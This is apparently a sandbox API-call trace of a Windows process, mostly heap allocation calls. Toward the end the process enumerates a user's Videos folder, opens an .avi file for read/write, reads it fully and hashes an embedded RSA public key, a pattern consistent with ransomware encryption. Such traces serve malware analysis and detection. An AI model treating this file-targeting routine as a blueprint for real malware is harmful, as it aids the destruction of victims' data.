HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.659] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\") returned="ee2U4KlmK-3zpwEnEyLp\\" [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.659] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b666a8 [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.659] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b666a8 | out: hHeap=0x2c0000) returned 1 [0205.659] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.659] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.659] PathFindFileNameW (pszPath="") returned="" [0205.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.659] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1a57fd0, ftCreationTime.dwHighDateTime=0x1d5d7e3, ftLastAccessTime.dwLowDateTime=0xcf758270, ftLastAccessTime.dwHighDateTime=0x1d5d7cd, ftLastWriteTime.dwLowDateTime=0xcf758270, ftLastWriteTime.dwHighDateTime=0x1d5d7cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.660] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1a57fd0, ftCreationTime.dwHighDateTime=0x1d5d7e3, ftLastAccessTime.dwLowDateTime=0xcf758270, ftLastAccessTime.dwHighDateTime=0x1d5d7cd, ftLastWriteTime.dwLowDateTime=0xcf758270, ftLastWriteTime.dwHighDateTime=0x1d5d7cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.660] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2312c4a0, ftCreationTime.dwHighDateTime=0x1d5e7bf, ftLastAccessTime.dwLowDateTime=0x8b3e1aa0, ftLastAccessTime.dwHighDateTime=0x1d5e203, ftLastWriteTime.dwLowDateTime=0x8b3e1aa0, ftLastWriteTime.dwHighDateTime=0x1d5e203, nFileSizeHigh=0x0, nFileSizeLow=0x77f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eh3k5OVCfE.avi", cAlternateFileName="EH3K5O~1.AVI")) returned 1 [0205.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.660] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\eh3k5OVCfE.avi") returned=".avi" [0205.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\eh3k5OVCfE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\eh3k5ovcfe.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.661] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=30704) returned 1 [0205.661] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.663] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x77ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.663] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.665] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.665] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x77f0, lpOverlapped=0x0) returned 1 [0205.665] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.665] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.665] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.665] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0205.666] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.666] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.666] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.666] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.666] GetLastError () returned 0x0 [0205.666] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.666] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0205.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.667] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.667] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.667] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x77f0) returned 0x3b81690 [0205.667] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b666a8 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe988 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b666f0 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9a0 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9d0 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9e8 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0205.667] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9d0 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9e8 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe9e8 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe9d0 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9e8 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9d0 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.668] GetCurrentThreadId () returned 0x600 [0205.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69a58 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 